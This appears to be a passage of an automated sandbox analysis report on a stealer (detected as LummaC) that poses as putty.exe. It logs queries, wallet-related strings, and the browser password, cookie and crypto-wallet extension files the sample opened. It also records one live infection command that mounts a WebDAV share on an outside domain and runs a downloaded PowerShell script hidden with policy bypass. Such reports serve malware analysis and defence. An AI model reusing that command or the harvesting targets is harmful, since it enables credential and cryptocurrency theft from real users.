Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	13_2_003CC960
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	13_2_003CCDE8
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	13_2_003CCE4F
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	13_2_003CCE8B

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\putty.exe

Code function: 13_2_003BB4A5 GetSystemTimeAsFileTime,__aulldiv,

13_2_003BB4A5

Source: C:\Users\user\AppData\Local\Temp\putty.exe

Code function: 13_2_00331931 _memset,__CxxThrowException@8,GetTimeZoneInformation,GetTimeZoneInformation,GetTimeZoneInformation,__aulldiv,_memset,_memset,

13_2_00331931

Source: C:\Users\user\AppData\Local\Temp\putty.exe

Code function: 13_2_003421D0 _memset,GetVersionExW,

13_2_003421D0

Source: C:\Windows\System32\net.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: putty.exe, 0000000D.00000003.1945569903.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1945832209.0000000000C13000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\putty.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: putty.exe PID: 2568, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: putty.exe, 0000000D.00000003.1895589408.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 20},{"t":0,"p":"%appdata%\\Electrum\\wal_
Source: putty.exe, 0000000D.00000003.1895589408.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: data%\\ElectronCash\\wallets","m":["*"],"z":s
Source: putty.exe, 0000000D.00000003.1919642720.0000000000C37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx LibertynU4
Source: putty.exe, 0000000D.00000003.1922819715.0000000000C0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: putty.exe, 0000000D.00000003.1895589408.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: H"m":["keystore"],"z":"Wallets/Ethereum","d":
Source: putty.exe, 0000000D.00000003.1922819715.0000000000C0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: powershell.exe, 0000000B.00000002.1796512551.00007FFB11440000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: sqlcolumnencryptionkeystoreprovider

Gathers information about network shares

Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c net use Z: \\todmeng.com@SSL\webdav\ && copy Z:\adv.ps1 C:\Users\user\Documents\adv.ps1 /y && start powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\user\Documents\adv.ps1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net use Z: \\todmeng.com@SSL\webdav\
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net use Z: \\todmeng.com@SSL\webdav\	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\xte0v1np.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\xte0v1np.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\xte0v1np.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\xte0v1np.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\xte0v1np.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putty.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
